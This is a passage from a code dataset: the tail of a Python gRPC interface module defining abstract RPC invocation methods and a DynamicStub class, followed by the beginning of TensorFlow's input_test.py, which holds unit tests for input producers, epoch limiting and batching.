def blocking_value_in_value_out(self, name, request, timeout):
"""Invokes a unary-request-unary-response RPC method.
This method blocks until either returning the response value of the RPC
(in the event of RPC completion) or raising an exception (in the event of
RPC abortion).
Args:
name: The RPC method name.
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future_value_in_value_out(self, name, request, timeout):
"""Invokes a unary-request-unary-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future will return an outcome indicating that the RPC returned
the response value of the RPC. In the event of RPC abortion, the
returned Future will return an outcome indicating that the RPC raised
an exceptions.RpcError.
"""
raise NotImplementedError()
@abc.abstractmethod
def inline_value_in_stream_out(self, name, request, timeout):
"""Invokes a unary-request-stream-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion of
the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def blocking_stream_in_value_out(self, name, request_iterator, timeout):
"""Invokes a stream-request-unary-response RPC method.
This method blocks until either returning the response value of the RPC
(in the event of RPC completion) or raising an exception (in the event of
RPC abortion).
Args:
name: The RPC method name.
request_iterator: An iterator that yields the request values of the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future_stream_in_value_out(self, name, request_iterator, timeout):
"""Invokes a stream-request-unary-response RPC method.
Args:
name: The RPC method name.
request_iterator: An iterator that yields the request values of the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future will return an outcome indicating that the RPC returned
the response value of the RPC. In the event of RPC abortion, the
returned Future will return an outcome indicating that the RPC raised
an exceptions.RpcError.
"""
raise NotImplementedError()
@abc.abstractmethod
def inline_stream_in_stream_out(self, name, request_iterator, timeout):
"""Invokes a stream-request-stream-response RPC method.
Args:
name: The RPC method name.
request_iterator: An iterator that yields the request values of the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion of
the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event_value_in_value_out(
self, name, request, response_callback, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-unary-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
response_callback: A callback to be called to accept the response value
of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event_value_in_stream_out(
self, name, request, response_consumer, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-stream-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
response_consumer: A stream.Consumer to be called to accept the response
values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event_stream_in_value_out(
self, name, response_callback, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-unary-response RPC method.
Args:
name: The RPC method name.
response_callback: A callback to be called to accept the response value
of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
@abc.abstractmethod
def event_stream_in_stream_out(
self, name, response_consumer, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-stream-response RPC method.
Args:
name: The RPC method name.
response_consumer: A stream.Consumer to be called to accept the response
values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
@abc.abstractmethod
def unary_unary_multi_callable(self, name):
"""Creates a UnaryUnaryMultiCallable for a unary-unary RPC method.
Args:
name: The RPC method name.
Returns:
A UnaryUnaryMultiCallable value for the named unary-unary RPC method.
"""
raise NotImplementedError()
@abc.abstractmethod
def unary_stream_multi_callable(self, name):
"""Creates a UnaryStreamMultiCallable for a unary-stream RPC method.
Args:
name: The RPC method name.
Returns:
A UnaryStreamMultiCallable value for the name unary-stream RPC method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_unary_multi_callable(self, name):
"""Creates a StreamUnaryMultiCallable for a stream-unary RPC method.
Args:
name: The RPC method name.
Returns:
A StreamUnaryMultiCallable value for the named stream-unary RPC method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_stream_multi_callable(self, name):
"""Creates a StreamStreamMultiCallable for a stream-stream RPC method.
Args:
name: The RPC method name.
Returns:
A StreamStreamMultiCallable value for the named stream-stream RPC method.
"""
raise NotImplementedError()
class DynamicStub(six.with_metaclass(abc.ABCMeta)):
"""A stub with RPC-method-bound multi-callable attributes.
Instances of this type responsd to attribute access as follows: if the
requested attribute is the name of a unary-unary RPC method, the value of the
attribute will be a UnaryUnaryMultiCallable with which to invoke the RPC
method; if the requested attribute is the name of a unary-stream RPC method,
the value of the attribute will be a UnaryStreamMultiCallable with which to
invoke the RPC method; if the requested attribute is the name of a
stream-unary RPC method, the value of the attribute will be a
StreamUnaryMultiCallable with which to invoke the RPC method; and if the
requested attribute is the name of a stream-stream RPC method, the value of
the attribute will be a StreamStreamMultiCallable with which to invoke the
RPC method.
"""
| bsd-3-clause | 6,527,837,977,558,582,000 | 35.936909 | 82 | 0.718507 | false |
brchiu/tensorflow | tensorflow/python/training/input_test.py | 2 | 94178 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training.input."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import os
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test as test_lib
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import input as inp
from tensorflow.python.training import queue_runner_impl
from tensorflow.python.util import compat
class MatchFilenamesOnceTest(test_lib.TestCase):
def test(self):
temp_dir = self.get_temp_dir()
filenames = [os.path.join(temp_dir, n) for n in os.listdir(temp_dir)]
additional = [
os.path.join(self.get_temp_dir(), "match_filenames.%d" % i)
for i in range(3)
]
for name in additional:
open(name, "w").write("Some contents")
filenames = list(set(filenames + additional))
with self.cached_session():
star = inp.match_filenames_once(os.path.join(self.get_temp_dir(), "*"))
question = inp.match_filenames_once(
os.path.join(self.get_temp_dir(), "match_filenames.?"))
one = inp.match_filenames_once(additional[1])
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
self.assertItemsEqual(
map(compat.as_bytes, filenames), self.evaluate(star))
self.assertItemsEqual(
map(compat.as_bytes, additional), self.evaluate(question))
self.assertItemsEqual([compat.as_bytes(additional[1])],
self.evaluate(one))
class LimitEpochsTest(test_lib.TestCase):
def testNoLimit(self):
with self.cached_session():
seven = constant_op.constant(7)
seven_forever = inp.limit_epochs(seven)
variables.local_variables_initializer().run()
for _ in range(100):
self.assertEqual(7, self.evaluate(seven_forever))
def testLimit(self):
with self.cached_session():
love_me = constant_op.constant("Love Me")
love_me_two_times = inp.limit_epochs(love_me, num_epochs=2)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
self.assertEqual(b"Love Me", self.evaluate(love_me_two_times))
self.assertEqual(b"Love Me", self.evaluate(love_me_two_times))
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(love_me_two_times)
class InputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session():
input_tensor = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
num_epochs = 2
queue = inp.input_producer(
input_tensor, num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(len(input_tensor) * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
self.assertAllEqual(input_tensor * num_epochs,
self.evaluate(dequeue_many))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testNoShapeInference(self):
with self.cached_session():
# Disable shape inference for the input.
input_value = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
input_tensor = array_ops.placeholder_with_default(input_value, shape=None)
num_epochs = 2
queue = inp.input_producer(
input_tensor, element_shape=[4], num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(len(input_value) * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
self.assertAllEqual(input_value * num_epochs, self.evaluate(dequeue_many))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testShapeError(self):
input_tensor = array_ops.placeholder(dtypes.float32, None)
with self.assertRaisesRegexp(ValueError, "fully defined shape"):
_ = inp.input_producer(input_tensor)
class StringInputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session():
strings = [b"to", b"be", b"or", b"not", b"to", b"be"]
num_epochs = 3
queue = inp.string_input_producer(
strings, num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(len(strings) * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
output = self.evaluate(dequeue_many)
self.assertAllEqual(strings * num_epochs, output)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testShuffle(self):
with self.cached_session():
strings = [b"a", b"b", b"c"]
num_epochs = 600
queue = inp.string_input_producer(
strings, num_epochs=num_epochs, shuffle=True, seed=271828)
dequeue_many = queue.dequeue_many(len(strings))
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Validate that we only shuffle the strings within an epoch and
# count how often each possible order appears.
expected = [b"abc", b"acb", b"bac", b"bca", b"cab", b"cba"]
frequency = {}
for e in expected:
frequency[e] = 0
for _ in range(num_epochs):
output = self.evaluate(dequeue_many)
key = b"".join(output)
self.assertIn(key, expected)
frequency[key] += 1
# Expect an approximately even distribution over all possible orders.
expected_frequency = num_epochs / len(expected)
margin = expected_frequency * 0.4
tf_logging.info("Observed counts: %s", frequency)
for key in expected:
value = frequency[key]
self.assertGreater(value, expected_frequency - margin)
self.assertLess(value, expected_frequency + margin)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testNullStringPython(self):
# Graph-construction time check for empty string list:
with self.cached_session():
with self.assertRaises(ValueError):
_ = inp.string_input_producer([])
def testNullString(self):
# Runtime check for empty string list. This is slightly oblique:
# The queue runner should die with an assertion error on the null
# input tensor, causing the dequeue to fail with an OutOfRangeError.
with self.cached_session():
coord = coordinator.Coordinator()
queue = inp.string_input_producer(
constant_op.constant(
[], dtype=dtypes.string))
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners(coord=coord)
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
coord.request_stop()
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
strings = [b"to", b"be", b"or", b"not", b"to", b"be"]
queue = inp.string_input_producer(
strings, shared_name="SHARED_NAME_XYZ", name="Q")
self.assertProtoEquals("s: 'SHARED_NAME_XYZ'",
queue.queue_ref.op.node_def.attr["shared_name"])
def testConstructionRace(self):
with self.cached_session() as sess:
strings = [b"to", b"be", b"or", b"not", b"to", b"be"]
queue = inp.string_input_producer(strings, shuffle=False)
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
for _ in range(2):
for string in strings:
# NOTE(mrry): This is not the recommended way to write
# dequeuing code (instead you should create a single dequeue
# op before starting the queue runners, and run it
# repeatedly), because it leads to concurrent reading and
# writing of the `tf.Graph` object. However, many users
# write code this way, so we include this test to ensure
# that we can support it.
self.assertEquals(string, sess.run(queue.dequeue()))
coord.request_stop()
coord.join(threads)
class RangeInputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session():
num_epochs = 3
range_size = 5
queue = inp.range_input_producer(
range_size, num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(range_size * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
output = self.evaluate(dequeue_many)
self.assertAllEqual(list(xrange(range_size)) * num_epochs, output)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testShuffle(self):
with self.cached_session():
num_epochs = 200
range_size = 2
queue = inp.range_input_producer(
range_size, num_epochs=num_epochs, shuffle=True, seed=314159)
dequeue_many = queue.dequeue_many(range_size)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Validate that we only shuffle the integers within an epoch and
# count how often each possible order appears.
expected = [12, 21]
frequency = {}
for e in expected:
frequency[e] = 0
for _ in range(num_epochs):
output = self.evaluate(dequeue_many)
key = 10 * (output[0] + 1) + (output[1] + 1)
self.assertIn(key, expected)
frequency[key] += 1
# Expect an approximately even distribution over all possible orders.
expected_frequency = num_epochs / len(expected)
margin = expected_frequency * 0.4
tf_logging.info("Observed counts: %s", frequency)
for key in expected:
value = frequency[key]
self.assertGreater(value, expected_frequency - margin)
self.assertLess(value, expected_frequency + margin)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
range_size = 5
queue = inp.range_input_producer(
range_size, shared_name="SHARED_NAME_XYZ", name="Q")
self.assertProtoEquals("s: 'SHARED_NAME_XYZ'",
queue.queue_ref.op.node_def.attr["shared_name"])
class SliceInputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session() as sess:
num_epochs = 3
source_strings = [b"Alpha", b"Beta", b"Delta", b"Gamma"]
source_ints = [2, 3, 5, 7]
slices = inp.slice_input_producer(
[source_strings, source_ints], num_epochs=num_epochs, shuffle=False)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
num_items = len(source_strings) * num_epochs
output = [sess.run(slices) for _ in range(num_items)]
out_strings, out_ints = zip(*output)
self.assertAllEqual(source_strings * num_epochs, out_strings)
self.assertAllEqual(source_ints * num_epochs, out_ints)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(slices)
for thread in threads:
thread.join()
def testShuffle(self):
with self.cached_session() as sess:
num_epochs = 1200
source_strings = ["A", "B", "D", "G"]
source_ints = [7, 3, 5, 2]
slices = inp.slice_input_producer(
[source_strings, source_ints],
num_epochs=num_epochs,
shuffle=True,
seed=161803)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Validate that we only shuffle the integers within an epoch and
# count how often each possible order appears.
expected = [
b",".join(x)
for x in itertools.permutations([b"A7", b"B3", b"D5", b"G2"])
]
frequency = {}
for e in expected:
frequency[e] = 0
for _ in range(num_epochs):
output = [sess.run(slices) for _ in range(len(source_strings))]
key = b",".join([s + compat.as_bytes(str(i)) for s, i in output])
self.assertIn(key, expected)
frequency[key] += 1
# Expect an approximately even distribution over all possible orders.
expected_frequency = num_epochs / len(expected)
margin = expected_frequency * 0.4
tf_logging.info("Observed counts: %s", frequency)
for key in expected:
value = frequency[key]
self.assertGreater(value, expected_frequency - margin)
self.assertLess(value, expected_frequency + margin)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(slices)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
source_strings = ["A", "B", "D", "G"]
source_ints = [7, 3, 5, 2]
slices = inp.slice_input_producer(
[source_strings, source_ints],
shared_name="SHARED_NAME_XYZ",
name="sip")
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
slices[0].op.inputs[1].op.inputs[0].op.node_def.attr["shared_name"])
class DictHelperTest(test_lib.TestCase):
def testListInputs(self):
l = [1, 2, 3, 11, 22, 33]
l2 = inp._as_tensor_list(l)
self.assertEquals(l, l2)
l3 = inp._as_original_type(l, l2)
self.assertEquals(l, l3)
def testDictInputs(self):
d = {"a": 1, "b": 2, "c": 3, "aa": 11, "bb": 22, "cc": 33}
l = inp._as_tensor_list(d)
self.assertEquals([1, 11, 2, 22, 3, 33], l)
d2 = inp._as_original_type(d, l)
self.assertEquals(d, d2)
def testHeterogeneousKeysDictInputs(self):
d = {"z": 1, 1: 42, ("a", "b"): 100}
l = inp._as_tensor_list(d)
self.assertEquals([100, 42, 1], l)
d2 = inp._as_original_type(d, l)
self.assertEquals(d, d2)
class BatchTest(test_lib.TestCase):
def _testOneThreadHelper(self, use_dict):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(
array_ops.stack([zero64, zero64 + 1]), [2, 1]),
values=math_ops.cast(
array_ops.stack([counter, -counter]), dtypes.float32),
dense_shape=[2])
if use_dict:
batched = inp.batch(
{
"c": counter,
"s": sparse_counter,
"S": "string"
},
batch_size=batch_size)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.batch(
[counter, sparse_counter, "string"], batch_size=batch_size)
batched_fetch = batched
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertAllEqual(results[0],
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(
results[1].indices,
np.vstack((
np.arange(2 * batch_size) // 2, # 0, 0, 1, 1, ...
[0, 1] * batch_size)).T)
# [x, -x, x+1, -(x+1), ...]
expected = np.arange(2 * i * batch_size, 2 * (i + 1) * batch_size) // 2
expected *= ([1, -1] * batch_size) # mult by [1, -1, 1, -1, ...]
self.assertAllEqual(results[1].values, expected)
self.assertAllEqual(results[1].dense_shape, [batch_size, 2])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testOneThread(self):
self._testOneThreadHelper(use_dict=False)
def testOneThreadDict(self):
self._testOneThreadHelper(use_dict=True)
def testUint32DataTypes(self):
values = constant_op.constant([0, 1, 2, 3, 4, 5], dtype=dtypes.uint32)
batched = inp.batch([values], batch_size=2)
with self.cached_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
sess.run(batched)
coord.request_stop()
for thread in threads:
thread.join()
def testUint64DataTypes(self):
values = constant_op.constant([0, 1, 2, 3, 4, 5], dtype=dtypes.uint64)
batched = inp.batch([values], batch_size=2)
with self.cached_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
sess.run(batched)
coord.request_stop()
for thread in threads:
thread.join()
def testOneThreadDynamicPad(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
string = array_ops.tile(["string"],
math_ops.to_int32(array_ops.stack([counter])))
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
batched = inp.batch(
[counter, string], batch_size=batch_size, dynamic_pad=True)
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched)
expected_results = np.arange(i * batch_size, (i + 1) * batch_size)
max_len = expected_results[-1]
self.assertAllEqual(results[0], expected_results)
expected_strings = [[b"string"] * rep + [b""] * (max_len - rep)
for rep in expected_results]
self.assertAllEqual(results[1], expected_strings)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testOneThreadEnqueueMany(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
pre_batched = inp.batch([counter, sparse_counter, "string"], batch_size=2)
batched = inp.batch(pre_batched, enqueue_many=True, batch_size=batch_size)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched)
self.assertAllEqual(results[0],
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].values,
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testManyThreads(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
num_threads=4)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
all_counts.extend(results[0])
self.assertAllEqual(results[2], [b"string"] * batch_size)
self.assertItemsEqual(all_counts, range(num_batches * batch_size))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testOneThreadSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size + extra_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(
array_ops.stack([zero64, zero64 + 1]), [2, 1]),
values=math_ops.cast(
array_ops.stack([counter, -counter]), dtypes.float32),
dense_shape=[2])
batched = inp.batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
allow_smaller_final_batch=True)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched)
self.assertAllEqual(results[0],
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(
results[1].indices,
np.vstack((
np.arange(2 * batch_size) // 2, # 0, 0, 1, 1, ...
[0, 1] * batch_size)).T)
# [x, -x, x+1, -(x+1), ...]
expected = np.arange(2 * i * batch_size, 2 * (i + 1) * batch_size) // 2
expected *= ([1, -1] * batch_size) # mult by [1, -1, 1, -1, ...]
self.assertAllEqual(results[1].values, expected)
self.assertAllEqual(results[1].dense_shape, [batch_size, 2])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra_elements.
results = sess.run(batched)
self.assertAllEqual(results[0],
np.arange(num_batches * batch_size,
num_batches * batch_size + extra_elements))
self.assertAllEqual(
results[1].indices,
np.vstack((
np.arange(2 * extra_elements) // 2, # 0, 0, 1, 1, ...
[0, 1] * extra_elements)).T)
self.assertAllEqual(results[1].dense_shape, [extra_elements, 2])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testManyThreadsSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size + extra_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
num_threads=4,
allow_smaller_final_batch=True)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
all_counts.extend(results[0])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra_elements.
results = sess.run(batched)
tf_logging.info("Last Batch: %s", results[0])
self.assertEqual(len(results[0]), extra_elements)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(extra_elements), np.zeros(extra_elements))).T)
self.assertAllEqual(results[1].dense_shape, [extra_elements, 1])
all_counts.extend(results[0])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
self.assertItemsEqual(all_counts,
range(num_batches * batch_size + extra_elements))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.batch(
[counter, "string"],
batch_size=batch_size,
shared_name="SHARED_NAME_XYZ",
name="Q")
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def testCannotInferRankError(self):
with self.cached_session():
x = array_ops.placeholder(dtype=dtypes.int64)
with self.assertRaisesRegexp(ValueError, "Cannot infer Tensor's rank"):
inp.batch([x], batch_size=2)
def testBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.batch([sparse], batch_size=2)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.batch([sparse], batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.batch([sparse], batch_size=2)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.batch([sparse], batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testSingleElementDict(self):
x = inp.batch({"c": [12, 12]}, batch_size=8)
self.assertAllEqual((8, 2), x["c"].get_shape().as_list())
